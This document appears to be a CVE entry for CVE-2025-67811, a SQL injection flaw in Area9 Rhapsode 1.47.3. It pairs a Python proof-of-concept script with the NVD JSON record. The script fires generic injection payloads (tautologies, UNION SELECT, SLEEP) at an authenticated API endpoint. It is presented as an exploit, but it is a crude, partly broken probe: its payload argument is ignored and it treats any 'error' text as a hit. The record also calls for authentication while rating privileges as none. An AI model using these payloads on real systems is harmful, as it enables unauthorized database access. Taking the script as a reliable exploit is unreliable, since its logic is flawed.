CVE-2025-67811

# CVE-2025-67811 SQL Injection PoC for Area9 Rhapsode # Authentication required to exploit this vulnerability import requests import argparse def sql_injection_test(target_url, endpoint, payload): """ Test for SQL injection vulnerability in Area9 Rhapsode API endpoints """ headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer <your_auth_token>' } # Basic authentication test payload test_payloads = [ "' OR '1'='1", "' OR '1'='1' --", "admin'--", "' UNION SELECT NULL--", "' AND SLEEP(5)--", "1' AND (SELECT COUNT(*) FROM users)>0--" ] for payload in test_payloads: data = { 'param': payload, 'id': payload } try: response = requests.post( f'{target_url}/api/{endpoint}', json=data, headers=headers, timeout=10 ) # Check for SQL error indicators if 'sql' in response.text.lower() or 'error' in response.text.lower(): print(f'[+] Potential SQL Injection detected with payload: {payload}') print(f'Response: {response.text[:200]}') return True except requests.exceptions.RequestException as e: print(f'[-] Request failed: {e}') return False if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-67811 SQL Injection Test') parser.add_argument('-u', '--url', required=True, help='Target URL') parser.add_argument('-e', '--endpoint', required=True, help='API endpoint') args = parser.parse_args() sql_injection_test(args.url, args.endpoint, '')

{"cve": {"id": "CVE-2025-67811", "sourceIdentifier": "[email protected]", "published": "2026-01-09T20:15:52.000", "lastModified": "2026-02-10T19:45:32.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Area9 Rhapsode 1.47.3 allows SQL Injection via multiple API endpoints accessible to authenticated users. Insufficient input validation allows remote attackers to inject arbitrary SQL commands, resulting in unauthorized database access and potential compromise of sensitive data. Fixed in v.1.47.4 and beyond."}, {"lang": "es", "value": "Area9 Rhapsode 1.47.3 permite la inyección SQL a través de múltiples puntos finales de API accesibles a usuarios autenticados. Una validación de entrada insuficiente permite a atacantes remotos inyectar comandos SQL arbitrarios, lo que resulta en acceso no autorizado a la base de datos y un posible compromiso de datos sensibles. Corregido en v.1.47.4 y versiones posteriores."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:area9lyceum:rhapsode:1.47.3:*:*:*:*:*:*:*", "matchCriteriaId": "B9B9C2BE-307B-4B8C-8D0E-E2F8EF707C6D"}]}]}], "references": [{"url": "https://area9.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://security.area9lyceum.com/cve-2025-67811/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}